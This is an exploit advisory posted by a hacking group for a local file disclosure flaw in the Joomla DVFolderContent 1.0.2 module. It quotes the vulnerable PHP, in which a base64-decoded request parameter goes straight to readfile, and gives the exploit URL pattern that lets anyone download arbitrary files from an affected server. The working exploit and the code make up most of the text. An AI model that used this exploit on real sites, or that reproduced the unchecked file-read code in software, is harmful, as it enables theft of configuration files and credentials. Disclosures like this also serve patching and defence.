###################### # Exploit Title : Joomla DVFolderContent V1.0.2 Module - Local File Disclosure # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.dvextensions.de/en/extensions/dvfoldercontent # Category [ Webapps ] # Tested on [ Win ] # Version : V1.0.2 # Date 2016/10/01 ###################### PoC The Vulnerable page is /modules/mod_dvfoldercontent/download.php $file = base64_decode($_GET['f']); if (is_file($file)) { $fileinfo = pathinfo($file); $filename = $fileinfo['basename']; $filesize = filesize($file); header("Content-Type: application/octet-stream; name=$filename"); header("Content-Disposition: attachment; filename=$filename"); header("Content-Length: $filesize"); header("Pragma: no-cache"); readfile($file); Exploit: http://server/modules/mod_dvfoldercontent/download.php?f=base64 Video : http://persian-team.ir/showthread.php?tid=165&pid=298 ###################### # Discovered by : Mojtaba MobhaM # B3li3v3 M3 I will n3v3r St0p # Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R $ Mr_Mask_Black And All Persian Hack Team Members # Homepage : http://persian-team.ir ######################